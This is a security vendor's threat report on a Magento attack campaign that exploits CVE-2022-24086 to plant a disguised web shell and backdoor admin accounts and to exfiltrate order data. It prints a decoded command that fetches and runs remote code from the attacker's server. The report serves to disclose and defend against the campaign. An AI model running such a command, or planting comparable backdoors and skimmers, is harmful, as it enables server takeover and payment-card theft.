Xurum: New Magento Campaign Discovered

There have been at least seven threat groups that have targeted Magento shops since 2015, which speaks to the prominence of the platform and the success the threat actors have achieved through this exploit.

Research By: Ron Mankivsky, Dennis German, Chen Doytshman, Maxim Zavodchik

Co-Authored: Tricia Howard

Executive summary

  • Akamai researchers have discovered an ongoing server-side template injection (CVE-2022-24086) campaign that is exploiting digital commerce websites. This campaign targets Magento 2 shops, and we have dubbed it Xurum in reference to the domain name of the attacker’s command and control (C2) server. 

  • We have observed activity in this campaign since at least January 2023. The attacker seems to be interested in payment stats from the orders in the victim's Magento store placed in the past 10 days. 

  • The attacker registers a new Magento component and masks it as “GoogleShoppingAds.”

  • The attacker uses an advanced web shell named “wso-ng” that is activated only when the attacker sends the cookie “magemojo000” to the backdoor “GoogleShoppingAds” component. 

  • The web shell login page masquerades as an error page containing a hidden login form that attempts to glean victim credentials.

  • The attacker creates a backdoor admin user in Magento, named “mageplaza” or “mageworx,” as another deception trick as those are the names of the popular Magento extensions stores.

  • The attacker uses the older Dirty COW exploit (CVE-2016-5195) to attempt privilege escalation within Linux. 

  • Evidence indicates Russian origins for this threat. 

  • Some of the websites involved in this campaign were observed to be infected with simple JavaScript-based skimmers with no attempt to obfuscate or hide its existence.


Digital commerce is a widely targeted industry for cybercriminals in general, but Magento’s widespread popularity has unfortunately made it an especially appealing (and lucrative) target. The most notable specific attack is Magecart,  in which the attackers aim to deploy JavaScript-based skimmers to illicitly acquire sensitive user information. These Magecart threat actors take advantage of well-known web vulnerabilities to achieve this acquisition.

There have been at least seven threat groups that have targeted Magento shops since 2015, which speaks to the prominence of the platform and the success the threat actors have achieved through this exploit.

In early 2022, the CVE-2022-24086 vulnerability came to light, enabling attackers to exploit the Magento template engine and execute arbitrary PHP code on susceptible targets. The exploit operates through multiple steps, with common attack vectors involving the abuse of either the check-out process or the wishlist functionality. Since its disclosure, this vulnerability has emerged as a primary entry point for numerous Magecart actors who are targeting vulnerable Magento 2 shops.

Over the past few months, Akamai has been closely monitoring a focused campaign that specifically targets a relatively small number of Magento deployments. We dubbed the campaign Xurum to reference the domain name of the C2 server utilized by the attackers.

Exploiting CVE-2022-24086 as initial access

During the ongoing campaign, we observed attackers attempting to execute two distinct payloads from a total of four IP addresses (Figure 1). These IPs are associated with the infrastructure of two hosting providers: Hetzner in Germany and Shock Hosting in the United States.

IP addresses Fig. 1: IP addresses observed to be associated with Xurum

The first variant executes the “file_get_contents” PHP function to send a request to the attacker’s C2 server xurum.com to determine whether the server is vulnerable to CVE-2022-24086 (Figure 2) while the Base64 blob decodes to https://xurum.com/mo.

Test script Fig. 2: Test script for the CVE-2022-24086 vulnerability

The second variant is the second stage payload where the attackers download and execute their malicious PHP code, which is hosted on the same xurum.com server. To evade detection, the exploit segment responsible for downloading and executing the remote malicious PHP code is obfuscated using Base64 encoding and executed via the "shell_exec" PHP function (Figure 3). The obfuscated part decodes to php -r "`wget -qO- https://xurum.com/b.txt`;".

PHP code that is obfuscated using Base64 encoding and executed via the "shell_exec" PHP function Fig. 3: Xurum payload encoded in Base64 for detection evasion

Xurum.com drop zone

During our investigation of the server xurum.com, it became evident that it is physically located in the Netherlands (Figure 4) and hosted by the Russian hosting company called VDSina.ru (Figure 5).

Server xurum.com is physically located in the Netherlands Fig. 4: xurum.com server IP information
Russian hosting company called VDSina.ru Fig. 5: xurum.com is hosted by VDSina.ru hosting company

At the time of our investigation, this domain was not considered as malicious by many well-known threat-scoring sites (Figure 6). This seeming legitimacy creates more user trust, and allows the threat actor’s operation to run essentially under the radar.

Showing the domain xurum.com as nonmalicious Fig. 6: VirusTotal output showing the domain xurum.com as nonmalicious

What does “xurum” mean?

As there are several iterations of this attack, we opted to call it xurum to distinguish this campaign from others.

Frequently, attackers employ distinct naming conventions for their domains or malware, which inadvertently or deliberately serve as their distinctive signature. During our investigation into the possible meaning of "xurum," we came across two potential interpretations.

According to Google Translate, xurum is defined as "right" in Latin, implying "doing the right thing" (Figure 7). On the other hand, WordSense Dictionary indicates that xurum is the word for “boy” in an extinct language once spoken in Guatemala (Figure 8).

According to Google Translate, xurum is defined as "right" in Latin, implying "doing the right thing" Fig. 7: Google Translate detects “xurum” as a Latin word
Translation of “xurum” Fig. 8: WordSense translates “xurum” as Sinacantán for “boy”

Please note that, as of writing this blog post, the attackers have taken down their xurum server and transitioned to another one that appears to still be in the quality assurance phase.

Exfiltrating order information and backdooring Magento

The malicious PHP script that is being downloaded from the xurum server and executed on the victim machine has several infection stages.

First of all, it collects technical information about the victim, such as:

  • PHP version

  • Whether the exploit landed in the “/pub” directory (common directory structure in Magento)

  • Whether the “/var/www/html/vendor/magento/google-shopping-ads/registration.php”  file exists and is writable 

  • The contents of “env.php” file, which includes crucial information of the Magento application, like environment-specific settings, but also secrets like the encryption key used to secure sensitive data like passwords, credit card details, and customer information

Then, it decodes a Base64 obfuscated blob and writes it to the “/var/www/html/vendor/magento/google-shopping-ads/registration.php” file (Figure 9).

Decoding a Base64 obfuscated blob and writes it to the ““/var/www/html/vendor/magento/google-shopping-ads/registration.php” file Fig. 9: Obfuscated blob containing a link to a web shell is written to “registration.php”

The new file contains intriguing content. Rather than maintaining their own copy of a web shell and hosting it on their C2 server, the code in the new file points to a public GitHub repository owned by a security researcher named "Bad Advertiser" or "@0xbadad”. Inside this repository, there is a known web shell named wso-ng. What makes this especially interesting, however, is that the web shell is not being written to the server's disk. Instead, it is fetched and executed only in memory when the newly created page "registration.php" is accessed. To further protect against unauthorized access, attackers also require the presence of a specific "magemojo000" cookie in the request for the web shell to execute successfully.

Then the attacker registers the new web shell functionality as a new Magento component masked as “GoogleShoppingAds” (Figure 10).

Attacker registers the new web shell functionality as a new Magento component Fig. 10: wso-ng web shell masquerades as GoogleShoppingAds component

After installing the backdoor, the attackers retrieve information about the sales order payment methods in the past 10 days and exfiltrate this data to their xurum.com drop zone, along with the previously collected technical information (Figure 11).

 Collecting information over the course of time Fig. 11: Collecting information on orders made in past 10 days

In the final step, the attackers create a backdoor admin user with the name "mageworx" (or "mageplaza" in some variations). These names correspond to popular Magento 2 extension stores, Mageworx and Mageplaza (Figure 12). This choice of names appears to be an attempt to camouflage their actions as something legitimate related to these reputable extension providers.

Note an interesting nuance in the backdoor user email addresses. There is a double “z” in “mageplazza” in the email address developer@mageplazza.com, while the legitimate store domain has a single “z” in its name mageplaza.com, which seems like a typo by the attackers. A similar typo was made in the other backdoor user email address: support@magaworx.com,  with an “a” instead of an “e” as in the original store name Mageworx.

 Names corresponding to popular Magento 2 extension stores, Mageworx and Mageplaza Fig. 12: Attackers create backdoor admin user mageworx/mageplaza

New web shell generation: wso-ng

A web shell is a malicious script or piece of code that attackers upload and execute on a web server to gain unauthorized access and control over the server and its underlying files and data in a persistent manner.

In this operation, the attackers are leveraging the very advanced web shell named wso-ng, which as mentioned above, was created by a security researcher several years ago. As stated by the author, wso-ng is a new generation of the older and famous WSO (which stands for Web Shell by Orb). 

In addition to the typical functionality found in web shells, such as system information gathering and file and SQL management, wso-ng has other remarkable features that make it stand out (Figure 13).

wso-ng web shell Fig. 13: A glance at the wso-ng web shell

New features

One of these new features is the concealed login page. Upon accessing the page, it responds with a 404 Not Found HTTP status code, giving the impression of a nonexistent page. The visible content appears to be blank at first glance (Figure 14). However, upon inspecting the page source code, it reveals a hidden login form.

The form is cleverly hidden from the viewer using a straightforward CSS trick, where it is shifted 1,000 pixels to the left, effectively keeping it out of the visible area. This hidden login form is designed to wait for the user to type in the password.

 wso-ng login page Fig. 14: wso-ng login page shows as blank, while having hidden functionality

Moreover, wso-ng integrates with VirusTotal, enabling automatic checks of the infected machine's IP reputation. Additionally, it seamlessly queries SecurityTrails, a service provided by the reputable Recorded Future threat intelligence company, and IPinfo to obtain information about other domains hosted on the same server.

The web shell also possesses offensive capabilities, attempting to evade hosting companies' PHP sandboxes. It employs various techniques, including the fastCGI and php add-filter exploits, to bypass disabled PHP functions successfully. Furthermore, it offers an auto-suggestion feature for local privilege escalation exploits that are compatible with the specific Linux version on which the web shell is hosted.

A more detailed analysis of this web shell will be provided in a future blog post.

Elevating privileges with an old-fashioned Dirty COW

We found another interesting tool in the attackers’ arsenal on the xurum.com server: a public exploit of an older CVE-2016-5195 named Dirty COW for Linux local privilege escalations (Figure 15).

 Dirty COW abuse for Linux privilege escalation Fig. 15: Screenshot of Dirty COW abuse for Linux privilege escalation

Web skimmer infection

Since many of our web application firewall (WAF) customers effectively mitigated this campaign, we did not directly observe further actions taken by the threat actors. However, during our investigation, we noticed website names that were indirectly related to this campaign, and showed in the origin/referer HTTP header of the exploit request.

At least one of these websites was infected with a simple web skimmer. The skimmer was installed on the main page, and didn’t apply any obfuscation techniques. It would collect credit card information and extract to a drop zone hosted on “smileface.site” (Figure 16).

Web skimmer installed screenshot Fig. 16: Web skimmer installed on one of the websites we investigated

Upon attempted access, this website responds with a cold “Get out!” message (Figure 17).

The website responds with a cold “Get out!” message Fig. 17: Response from smileface.site upon access attempt

The IP information shows the server is located in Moscow and hosted by the Russian “reg.ru” hosting (Figure 18).

The IP information shows the server is located in Moscow and hosted by the Russian “reg.ru” hosting Fig. 18: smileface.site is hosted on the reg.ru hosting


Our investigation into this campaign indicates that it dates back to at least the end of January 2023. The attackers have shown a meticulous approach, targeting specific Magento 2 instances rather than indiscriminately spraying their exploits across the internet. They demonstrate a high level of expertise in Magento and invest considerable time in understanding its internals, setting up attack infrastructure, and testing their exploits on real targets.

This campaign serves as a practical example of how older vulnerabilities continue to be exploited years after disclosure, as businesses struggle to keep up with patches and security measures.

Security recommendations

To prevent initial server access, security practitioners are advised to stay updated with the latest patches and complement them with the implementation of a WAF, such as Akamai App & API Protector.

Since the primary objective of these Magecart threat actors is to infect Magento pages with web skimmers and steal customers' credit card information, additional dedicated security solutions are strongly recommended. These solutions should provide visibility into browser script behaviors and offer defense against client-side attacks.

An effective approach involves deploying security measures closer to where the actual attacks on clients occur. This includes identifying attempted reads from sensitive input fields and data exfiltration. We suggest promptly collecting these events to facilitate rapid and efficient mitigation with the help of security products such as Client-Side Protection & Compliance.

Stay tuned

During our analysis of recent Magento CVE-2022-24086 exploitation attempts on our customers, we discovered additional campaigns that are currently under investigation. We will continue to investigate further and share our findings with the security community. For more breaking security research, follow us on Twitter.


The following indicators of compromise (IOCs) are presented to help the community detect the malicious activity described in the post.



Attacking IP

Attacking IP

Attacking IP

Attacking IP


Malware hosting domain


File name


Magento user


Magento user


Email address


Email address